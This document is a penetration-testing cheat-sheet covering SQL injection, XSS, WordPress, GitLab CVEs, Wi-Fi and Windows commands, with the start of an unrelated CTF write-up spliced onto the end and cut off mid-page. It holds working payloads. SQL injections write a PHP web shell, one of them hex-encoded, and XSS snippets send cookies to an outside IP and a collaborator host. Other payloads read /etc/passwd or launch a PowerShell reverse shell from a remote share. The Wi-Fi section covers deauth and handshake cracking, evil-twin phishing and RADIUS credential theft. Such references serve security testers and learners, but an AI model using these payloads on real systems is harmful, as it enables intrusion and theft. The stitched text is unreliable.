[https://www.youtube.com/watch?v=F1Tm4b57ors](https://www.youtube.com/watch?v=F1Tm4b57ors) ``` POST /index.php HTTP/1.1 Host: 127.0.0.1 name=snovvcrash&email=admin%example.com++++++++++11&password=qwe12345 ``` #### Commas blocked by WAF ``` id=-1' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name from mysql.innodb_table_stats)b ON 1=1# ``` #### Write File ``` id=1' UNION ALL SELECT 1,2,3,4,"<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1');} ?>",6 INTO OUTFILE 'C:\\Inetpub\\wwwroot\\backdoor.php';# id=1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '/var/www/html/backdoor.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a;-- - ``` #### Read File ``` id=1' UNION ALL SELECT LOAD_FILE('c:\\xampp\\htdocs\\admin\\db.php'),2,3-- - ``` ### MSSQL * [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/) * [https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/](https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/) ### sqlmap * [Usage · sqlmapproject/sqlmap Wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage) * [PayloadsAllTheThings/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#sql-injection-using-sqlmap) Write file: ``` $ sqlmap -r request.req --batch --file-write=./backdoor.php --file-dest=C:/Inetpub/wwwroot/backdoor.php ``` Test WAF: * [https://www.1337pwn.com/use-sqlmap-to-bypass-cloudflare-waf-and-hack-website-with-sql-injection/](https://www.1337pwn.com/use-sqlmap-to-bypass-cloudflare-waf-and-hack-website-with-sql-injection/) ``` $ sqlmap.py -u 'https://127.0.0.1/index.php' --data='{"id":"*"}' -p id --identify-waf --tamper='between,randomcase,space2comment' --random-agent --tor --check-tor --thread=1 -b --batch -v6 ``` ## XSS ### Redirections * [https://developer.mozilla.org/ru/docs/Web/HTTP/Redirections](https://developer.mozilla.org/ru/docs/Web/HTTP/Redirections) ```html <head> <meta http-equiv="refresh" content="0; URL=http://www.example.com/" /> </head> ``` ### Data Grabbers #### Cookies * [https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies) Img tag: ``` <img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)"> ``` Fetch: ```javascript <script> fetch('https://<SESSION>.burpcollaborator.net', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script> ``` ### XMLHttpRequest #### XSS to LFI * [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html) ```javascript <script> var xhr = new XMLHttpRequest; xhr.onload = function() { document.write(this.responseText); }; xhr.open("GET", "file:///etc/passwd"); xhr.send(); </script> ``` ``` <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script> ``` #### XSS to CSRF * [https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf) If the endpoint is accessible only from localhost: ```javascript <script> var xhr; if (window.XMLHttpRequest) { xhr = new XMLHttpRequest(); } else { xhr = new ActiveXObject("Microsoft.XMLHTTP"); } xhr.open("POST", "/backdoor.php"); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send("cmd=powershell -nop -exec bypass -f \\\\10.10.15.123\\share\\rev.ps1"); </script> ``` With capturing CSRF token first: ```javascript <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('GET', '/email', true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('POST', '/email/change-email', true); changeReq.send('csrf='+token+'&[email protected]') }; </script> ``` ## WordPress Reverse-shell with a malicious plugin: ``` $ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php . $ zip plugin-shell.zip plugin-shell.php ...Upload plugin-shell.zip and install it (but do not activate)... $ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami' ``` ### wpscan * [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) * [https://wpscan.com/profile](https://wpscan.com/profile) ``` $ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force -e ap $ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt ``` ## GitLab * [https://devcraft.io/assets/hacktivitycon-slides.pdf](https://devcraft.io/assets/hacktivitycon-slides.pdf) * [https://github.com/dotPY-hax/gitlab_RCE](https://github.com/dotPY-hax/gitlab_RCE) ### SSRF → Redis → RCE (CE/EE) **CVE-2018-19571, CVE-2018-19585** * [https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293) * [https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) * [https://www.exploit-db.com/exploits/49334](https://www.exploit-db.com/exploits/49334) Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with `git://` scheme: ``` git://127.0.0.1:6379/%0a<REDIS_COMMANDS> ``` ### Path Traversal → LFI → RCE (CE/EE) **CVE-2020-10977** * [https://xakep.ru/2020/05/26/gitlab-exploit/](https://xakep.ru/2020/05/26/gitlab-exploit/) * [https://www.exploit-db.com/exploits/49076](https://www.exploit-db.com/exploits/49076) ### Path Traversal → File Write → RCE (EE) **CVE-2019-19088** * [https://gitlab.com/gitlab-org/gitlab/-/issues/36029](https://gitlab.com/gitlab-org/gitlab/-/issues/36029) ## Web Security Academy * [All learning materials - detailed / Web Security Academy](https://portswigger.net/web-security/all-materials/detailed) * [All labs / Web Security Academy](https://portswigger.net/web-security/all-labs) * [SQL injection cheat sheet / Web Security Academy](https://portswigger.net/web-security/sql-injection/cheat-sheet) * [Cross-Site Scripting (XSS) Cheat Sheet / Web Security Academy](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) ## Upgrade Burp * [Downloads / Jython](https://www.jython.org/download.html) * [Прокачай свой Burp! 11 наиболее полезных плагинов к Burp Suite — «Хакер»](https://xakep.ru/2018/08/23/burp-suite-plugins/) * [Burp и его друзья / Блог компании Digital Security / Хабр](https://habr.com/ru/company/dsec/blog/529088/) ### Extensions BApp Store: * [ActiveScan++](https://portswigger.net/bappstore/3123d5b5f25c4128894d97ea1acc4976) **Pro** * [Add Custom Header](https://portswigger.net/bappstore/807907f5380c4cb38748ef4fc1d8cdbc) * [Additional CSRF Checks](https://portswigger.net/bappstore/2d12070c90cb4a0f91cde0b8927fd606) * [Additional Scanner Checks](https://portswigger.net/bappstore/a158fd3fc9394253be3aa0bc4c181d1f) **Pro** * [Attack Surface Detector](https://portswigger.net/bappstore/47027b96525d4353aea5844781894fb1) * [Backslash Powered Scanner](https://portswigger.net/bappstore/9cff8c55432a45808432e26dbb2b41d8) **Pro** * [Collaborator Everywhere](https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968) **Pro** * [CSRF Scanner](https://portswigger.net/bappstore/60f172f27a9b49a1b538ed414f9f27c3) **Pro** * [Freddy, Deserialization Bug Finder](https://portswigger.net/bappstore/ae1cce0c6d6c47528b4af35faebc3ab3) **Pro** * [HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) * [IP Rotate](https://portswigger.net/bappstore/2eb2b1cb1cf34cc79cda36f0f9019874) * [J2EEScan](https://portswigger.net/bappstore/7ec6d429fed04cdcb6243d8ba7358880) **Pro** * [Java Deserialization Scanner](https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae) **Pro** * [Java Serialized Payloads](https://portswigger.net/bappstore/bc737909a5d742eab91544705c14d34f) * [JS Link Finder](https://portswigger.net/bappstore/0e61c786db0c4ac787a08c4516d52ccf) **Pro** * [JSON Beautifier](https://portswigger.net/bappstore/309ef28d45ff4f19bedfed3896cb3ca9) * [JSON Web Token Attacker](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61) * [Logger++](https://portswigger.net/bappstore/470b7057b86f41c396a97903377f3d81) * [SQLiPy Sqlmap Integration](https://portswigger.net/bappstore/f154175126a04bfe8edc6056f340f52e) * [SSL Scanner](https://portswigger.net/bappstore/474b3c575a1a4584aa44dfefc70f269d) * [Taborator](https://portswigger.net/bappstore/c9c37e424a744aa08866652f63ee9e0f) **Pro** * [WordPress Scanner](https://portswigger.net/bappstore/77a12b2966844f04bba032de5744cd35) GitHub: * [Femida XSS](https://github.com/wish-i-was/femida) * [SHELLING](https://github.com/ewilded/shelling) * [Burp Vulners Scanner](https://github.com/vulnersCom/burp-vulners-scanner) * [HackBar](https://github.com/d3vilbug/HackBar) ## Tools ### gobuster * [https://github.com/OJ/gobuster/releases](https://github.com/OJ/gobuster/releases) ``` $ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/wordlists/dirbuster/directory-list[-lowercase]-2.3-medium.txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1 $ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words[-lowercase].txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1 ``` ### wfuzz * [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz) * [https://wfuzz.readthedocs.io/en/latest/](https://wfuzz.readthedocs.io/en/latest/) ``` $ wfuzz -e encoders $ wfuzz -c -u 'http://10.10.13.37/index.php?id=FUZZ' -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -f wfuzz.out --hh 1337 $ wfuzz -c -u 'http://10.10.13.37' --basic 'FUZZ:FUZ2Z' -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt --hc 1337 ``` ### aquatone * [https://github.com/michenriksen/aquatone/releases](https://github.com/michenriksen/aquatone/releases) Default ports: ``` $ cat targets.txt | ./aquatone -ports 80,443,8000,8080,8443 -out 10.0-255.0-255.0-255 ``` From Nmap XML: ``` $ ports=`cat nmap/tcp.gnmap | grep -ioP '\d+/open/tcp//http' | awk -F/ '{print $1}' | sort -u | awk 1 ORS=',' | sed 's/.$//'` $ cat targets.txt | ./aquatone -ports $ports -out 10.0-255.0-255.0-255_nmap Or $ cat nmap/tcp.xml | ./aquatone -out 10.0-255.0-255.0-255_nmap ``` ### amass * [https://github.com/OWASP/Amass/releases](https://github.com/OWASP/Amass/releases) * [https://snovvcrash.github.io/2020/05/10/subdomain-discovery.html](https://snovvcrash.github.io/2020/05/10/subdomain-discovery.html) ``` $ amass intel -active -config config.ini -whois -df domains.txt -ipv4 -src -v -o intel.out $ amass enum -active -brute -config config.ini -df domains.txt -ipv4 -src -v -o enum.out ``` ### subfinder * [https://github.com/projectdiscovery/subfinder/releases](https://github.com/projectdiscovery/subfinder/releases) ``` $ subfinder -all -config config.yaml -d hackerone.com -o subdomains.txt [-oI -nW] ``` ### shuffledns * [https://github.com/projectdiscovery/shuffledns/releases](https://github.com/projectdiscovery/shuffledns/releases) ``` $ shuffledns -d hackerone.com -r /opt/dnsvalidator/resolvers.txt -w /usr/share/commonspeak2-wordlists/subdomains/subdomains.txt -o subdomains.txt -t 500 ``` ### massdns * [https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns) * [https://github.com/vortexau/dnsvalidator](https://github.com/vortexau/dnsvalidator) ``` $ massdns -r /opt/dnsvalidator/resolvers.txt domains.txt -w domains-resolved.txt -o S ``` ### chaos * [https://github.com/projectdiscovery/chaos-client](https://github.com/projectdiscovery/chaos-client) ``` $ chaos -d megacorp.com -key <API_KEY> -http-status-code -http-title -http-url -o chaos.out ``` ### nuclei * [https://github.com/projectdiscovery/nuclei/releases](https://github.com/projectdiscovery/nuclei/releases) ``` $ nuclei -update-templates $ nuclei -l domains.txt -t cves/ -o nuclei.out ``` ### httpx * [https://github.com/projectdiscovery/httpx/releases](https://github.com/projectdiscovery/httpx/releases) ``` $ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out ``` ### nikto * [https://github.com/sullo/nikto](https://github.com/sullo/nikto) ``` $ nikto -h http://127.0.0.1 -Cgidirs all ``` # Wi-Fi * [https://www.aircrack-ng.org/doku.php?id=newbie_guide](https://www.aircrack-ng.org/doku.php?id=newbie_guide) * [https://defkey.com/airodump-ng-shortcuts](https://defkey.com/airodump-ng-shortcuts) * [https://xakep.ru/2020/01/27/wifi-total-pwn/](https://xakep.ru/2020/01/27/wifi-total-pwn/) ## Hardware ### TP-Link TL-WN722N v2/v3 * [https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9](https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9) * [https://codeby.net/threads/gajd-2020-po-zapusku-rezhima-monitora-v-tp-link-tl-wn722n-v2-v3-kali-linux-wardriving.70594/](https://codeby.net/threads/gajd-2020-po-zapusku-rezhima-monitora-v-tp-link-tl-wn722n-v2-v3-kali-linux-wardriving.70594/) Chipset: TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]. Check kernel version: ``` $ uname -r 5.8.0-kali2-amd64 ``` Install kernel headers: ``` $ sudo apt install -y bc linux-headers-amd64 ``` Build drivers from source and install: ``` $ sudo -i # echo "blacklist r8188eu" >> "/etc/modprobe.d/realtek.conf" # git clone https://github.com/aircrack-ng/rtl8188eus/tree/v5.3.9 /opt/rtl8188eus && cd /opt/rtl8188eus # make && make install # reboot ``` Test for packet injections: ``` $ sudo aireplay-ng -9 wlan1 ``` ### Alfa AWUS036ACH AC1200 * [https://github.com/aircrack-ng/rtl8812au](https://github.com/aircrack-ng/rtl8812au) Chipset: Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter. Install drivers with apt: ``` $ sudo apt update && sudo apt upgrade -y $ sudo apt install realtek-rtl88xxau-dkms $ sudo reboot ``` Or build from source and install: ``` $ sudo -i # git clone https://github.com/aircrack-ng/rtl8812au /opt/rtl8812au && cd /opt/rtl8812au # ./dkms-install.sh # reboot ``` Test for packet injections: ``` $ sudo aireplay-ng -9 wlan1 ``` ## Prologue Install stuff: ``` $ sudo apt install lshw cowpatty -y ``` Make sure lsusb can see the wireless adapters (it would show the chipset): ``` $ lsusb Bus 001 Device 003: ID 2357:010c TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] Bus 001 Device 010: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter ``` Make sure iwconfig can see the wireless adapter: ``` $ sudo ifconfig $ sudo iwconfig $ sudo iw dev ``` Turn on monitor mode manually: ``` $ sudo ip link set wlan1 down $ sudo iwconfig wlan1 mode monitor $ sudo ip link set wlan1 up $ sudo iwconfig ``` Undo: ``` $ sudo ip link set wlan1 down $ sudo iwconfig wlan1 mode managed $ sudo ip link set wlan1 up $ sudo iwconfig ``` Or create a separate virtual interface in monitor mode: ``` $ sudo ip link set wlan1 down $ sudo iw dev wlan1 interface add wlan1mon type monitor $ sudo ip link set wlan1 up $ sudo service NetworkManager restart $ sudo iwconfig ``` Undo: ``` $ sudo ip link set wlan1 down sudo iw dev wlan1mon del sudo ip link set wlan1 up sudo iwconfig ``` Or do it with airmon-ng: ``` $ sudo airmon-ng start wlan1 ``` In fact, that does not need to be done as airodump-ng can put the wireless card into monitor mode automatically: ``` $ sudo airodump wlan1 ``` Make sure, you're not using the default MAC: ``` $ macchanger -s wlan1 ``` Restart NM when there are troubles with Internet connection: ``` $ sudo service NetworkManager restart ``` ## WPA/WPA2 ### Personal #### 4-Way Handshake * [https://www.wifi-professionals.com/2019/01/4-way-handshake](https://www.wifi-professionals.com/2019/01/4-way-handshake) * [https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work](https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work) * [https://www.aircrack-ng.org/doku.php?id=cracking_wpa](https://www.aircrack-ng.org/doku.php?id=cracking_wpa) * [https://security.stackexchange.com/questions/111527/no-handshake-recorded-from-airodump-ng](https://security.stackexchange.com/questions/111527/no-handshake-recorded-from-airodump-ng) * [https://hackware.ru/?p=74](https://hackware.ru/?p=74) * [https://hackware.ru/?p=7542](https://hackware.ru/?p=7542) * [https://hackware.ru/?p=5209](https://hackware.ru/?p=5209) 1\. Look for targets. Save BSSID (`00:00:00:00:00:01`), CH (`9`), ESSID (`SomeEssid`) and STATION (`00:00:00:00:00:02`) if deauth will be required: ``` $ sudo airodump-ng -M -U wlan1 [-c 36-165 (for 5GHz, see WLAN channels) or just -c 1-200 for all] [--band <abg>] qq ``` 2\. Start dumping the target's traffic: ``` [$ sudo iwconfig wlan1 channel 9] $ sudo airodump-ng -c 9 --bssid 00:00:00:00:00:01 -w SomeEssid wlan1 ``` 3\. Send DeAuth packets in a separate terminal till `WPA handshake: XX:XX:XX:XX:XX:XX` appears (aggressive): ``` $ sudo aireplay-ng [-D] -0 2 -a 00:00:00:00:00:01 -c 00:00:00:00:00:02 wlan1 Or $ for client in `cat 00:00:00:00:00:01.txt`; do sudo aireplay-ng -D -0 2 -a 00:00:00:00:00:01 -c $client wlan1; done ``` 4\. Clean the capture, check it once again, covert to Hashcat format and crack it: ``` $ aircrack-ng SomeEssid*.cap $ wpaclean SomeEssid-cleaned.cap SomeEssid-01.cap $ cowpatty -r SomeEssid-cleaned.cap -s SomeEssid -c $ /usr/lib/hashcat-utils/cap2hccapx.bin SomeEssid-cleaned.cap SomeEssid.hccapx $ hashcat -m 2500 -a 0 cleaned.hccapx rockyou.txt ``` ##### wifite2 ``` $ sudo wifite -vi wlan1 --clients-only --wpa --no-wps ``` #### PMKID * [https://https://habr.com/ru/company/jetinfosystems/blog/419383/](https://habr.com/ru/company/jetinfosystems/blog/419383/) ##### wifite2 ``` $ sudo wifite -vi wlan1 --pmkid ``` #### wifite2 * [https://github.com/derv82/wifite2](https://github.com/derv82/wifite2) * [https://github.com/nuncan/wifite2mod](https://github.com/nuncan/wifite2mod) > «Поэтому оптимальный алгоритм взло… аудита следующий: определяем, включен ли на целевой точке доступа режим WPS. Если да, запускаем PixieDust. Безуспешно? Тогда перебор известных пинов. Не получилось? Проверяем, не включено ли шифрование WEP, которое тоже обходится влет. Если нет, то выполняем атаку PMKID на WPA(2). Если уж и так не получилось, тогда вспоминаем классику и ждем хендшейка (чтобы не палиться) или активно кикаем клиентов, чтобы наловить их сессии авторизации.» — [\]\[](https://xakep.ru/2020/01/27/wifi-total-pwn/) Install wifite2: ``` $ git clone https://github.com/derv82/wifite2 ~/tools/wifite2 && cd ~/tools/wifite2 $ sudo python setup.py install ``` Install hcxdumptool (for capturing PMKID hashes): ``` $ git clone https://github.com/ZerBea/hcxdumptool.git ~/tools/hcxdumptool && cd ~/tools/hcxdumptool $ sudo apt install libcurl4-openssl-dev libssl-dev -y $ make $ sudo make install ``` Install (for converting PMKID packet captures into hashcat's format): ``` $ git clone https://github.com/ZerBea/hcxtools.git ~/tools/hcxtools && cd ~/tools/hcxtools $ make $ sudo make install ``` Fire up wifite2: ``` $ sudo wifite -vi wlan1 [--kill] [-5] ``` #### airgeddon * [https://github.com/v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) ``` $ git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git ~/tools/airgeddon && cd ~/tools/airgeddon $ sudo bash airgeddon.sh ``` #### wifiphisher * [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) * [Creating a custom phishing scenario · wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher/blob/5ae21ab93e0dce85dd4bf76e68cc3b996aa33dea/docs/custom_phishing_scenario.rst) Install: ``` $ git clone https://github.com/wifiphisher/wifiphisher.git ~/tools/wifiphisher && cd ~/tools/wifiphisher $ sudo python3 setup.py install # Install any dependencies ``` Start a rogue AP with fake captive portal (firmware update scenario) on wlan1 and deauth clients with wlan2: ``` $ sudo wifiphisher -aI wlan1 -eI wlan2 -p wifi_connect ``` ### Enterprise * [https://medium.com/@adam.toscher/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2](https://medium.com/@adam.toscher/top-5-ways-i-gained-access-to-your-corporate-wireless-network-lo0tbo0ty-karma-edition-f72e7995aef2) #### hostapd-wpe * [https://pentest.blog/attacking-wpa-enterprise-wireless-network/](https://pentest.blog/attacking-wpa-enterprise-wireless-network/) * [https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html](https://teckk2.github.io/wifi%20pentesting/2018/08/09/Cracking-WPA-WPA2-Enterprise.html) * [https://codeby.net/threads/vzlom-wpa-2-enterprise-s-pomoschju-ataki-evil-twin.59920/](https://codeby.net/threads/vzlom-wpa-2-enterprise-s-pomoschju-ataki-evil-twin.59920/) 1\. Install dependencies: ``` $ sudo apt install libnl-3-dev libssl-dev $ sudo apt install hostapd-wpe ``` 2\. Install and configure hostapd-wpe: ``` $ sudo vi /etc/hostapd-wpe/hostapd-wpe.conf ... interface=wlan1 eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user ssid=NotEvilTwinAP channel=1 hw_mode=b auth_server_addr=127.0.0.1 auth_server_port=18120 auth_server_shared_secret=S3cr3t! wpa_pairwise=TKIP CCMP ``` 3\. Run fake AP with RADIUS server ``` $ sudo airmon-ng check kill $ sudo /usr/sbin/hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf ``` 4\. Crack Net-NTLM hashes (mask example) ``` $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l ?1?1?1?1?1?1?1?1 $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u ?1?1?1?1?1?1?1?1 $ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u?s ?1?1?1?1?1?1?1?1 ``` #### apd_launchpad * [https://github.com/WJDigby/apd_launchpad](https://github.com/WJDigby/apd_launchpad) * [https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html](https://www.c0d3xpl0it.com/2017/03/enterprise-wifi-hacking-with-hostapd-wpe.html) ``` $ python ~/tools/apd_launchpad/apd_launchpad.py -t radius -s MegaCorp -i wlan1 -ch 1 -cn '*.megacorp.local' -o MegaCorp $ vi radius/radius.conf ... eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user ``` #### EAPHammer * [https://github.com/s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) Setup: ``` $ git clone https://github.com/s0lst1c3/eaphammer.git ~/tools/eaphammer && cd ~/tools/eaphammer $ sudo ./kali-setup $ sudo python3 -m pip install flask-cors flask-socketio --upgrade ``` Create a certificate: ``` $ sudo ./eaphammer --cert-wizard ``` Steal RADIUS creds: ``` $ sudo ./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 1 --interface wlan1 --auth wpa-eap --creds ``` ## Misc ### WLAN channels * [https://en.wikipedia.org/wiki/List_of_WLAN_channels](https://en.wikipedia.org/wiki/List_of_WLAN_channels) * [https://www.ekahau.com/wp-content/uploads/2020/05/unlicensed-spectrum-and-channel-allocations_6-ghz.png](https://www.ekahau.com/wp-content/uploads/2020/05/unlicensed-spectrum-and-channel-allocations_6-ghz.png) ### Signal Strength * [https://eyesaas.com/wi-fi-signal-strength/](https://eyesaas.com/wi-fi-signal-strength/) # Windows ## Processes Kill process from cmd: ``` Cmd > taskkill /f /im:calc.exe ``` ## Secure Delete ### cipher ``` Cmd > cipher /w:H ``` ### sdelete File: ``` Cmd > sdelete -p 7 testfile.txt ``` Directory (recursively): ``` Cmd > sdelete -p 7 -r "C:\temp" ``` Disk or partition: ``` Cmd > sdelete -p 7 -c H: ``` ## System Perfomance ``` Cmd > perfmon /res ``` ## Network ### Connections and Routes ``` Cmd > netstat -b Cmd > netstat -ano Cmd > route print [-4] ``` ### Clean Cache ``` Cmd > netsh int ip reset Cmd > netsh int tcp reset Cmd > ipconfig /flushdns Cmd > netsh winsock reset Cmd > route -f [Cmd> ipconfig -renew] ``` Hide/unhide computer name on LAN: ``` Cmd > net config server Cmd > net config server /hidden:yes Cmd > net config server /hidden:no (+ reboot) ``` ## Symlinks ``` Cmd > mklink Link <FILE> Cmd > mklink /D Link <DIRECTORY> ``` ## Wi-Fi Credentials * [https://www.nirsoft.net/utils/wireless_key.html#DownloadLinks](https://www.nirsoft.net/utils/wireless_key.html#DownloadLinks) ``` > netsh wlan show profiles > netsh wlan show profiles "ESSID" key=clear ``` ## Installed Software ``` PS > Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize > InstalledSoftware.txt ``` ## ADS ``` PS > Get-Item 'file.txt' -Stream * PS > Get-Content 'file.txt' -Stream Password Or PS > type 'file.txt:Password' ``` ## .msc ``` secpol.msc -- "Local Security Policy" -- «Локальная политика безопасности» gpedit.msc -- "Local Group Policy Editor" -- «Редактор локальной групповой политики» lusrmgr.msc -- "Local Users and Groups (Local)" -- «Локальные пользователи и группы (локально)» certmgr.msc -- "Certificates - Current User" -- «Сертификаты - текущий пользователь» ``` ## KRShowKeyMgr Run: ``` rundll32.exe keymgr.dll, KRShowKeyMgr ``` ## Permissions Take own of a directory and remove it (run cmd.exe as admin): ``` Cmd > takeown /F C:\$Windows.~BT\* /R /A Cmd > icacls C:\$Windows.~BT\*.* /T /grant administrators:F Cmd > rmdir /S /Q C:\$Windows.~BT\ ``` ## DISM ### TelnetClient ``` Cmd > DISM /online /Enable-Feature /FeatureName:TelnetClient ``` ## BitLocker Check encryption status of all drives (must be elevated): ``` Cmd > manage-bde -status ```
# Challenge Name: Top of the Charts ![date](https://img.shields.io/badge/date-17.04.2021-brightgreen.svg) ![solved in time of CTF](https://img.shields.io/badge/solved-in%20time%20of%20CTF-brightgreen.svg) ![crypto category](https://img.shields.io/badge/category-Web-blueviolet.svg) ![value](https://img.shields.io/badge/value-250-blue.svg) ![score](https://img.shields.io/badge/score-5/10-ff69b4.svg) ## Description I found this site which seems to boast about itself too much. It claims to be above everything else but I'm not so sure. I think the success has gone to its head. curl http://chals5.umdctf.io:4003 ## Detailed solution Starting by opening the challenge link http://chals5.umdctf.io:4003 ![image](https://user-images.githubusercontent.com/72421091/115165229-71d41980-a09c-11eb-922f-66cb7f0030aa.png) Let's check the page source view-source:http://chals5.umdctf.io:4003/ ```html <!doctype html> <html lang="en"> <head> <link rel= "stylesheet" type= "text/css" href= "/static/main.css"> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" 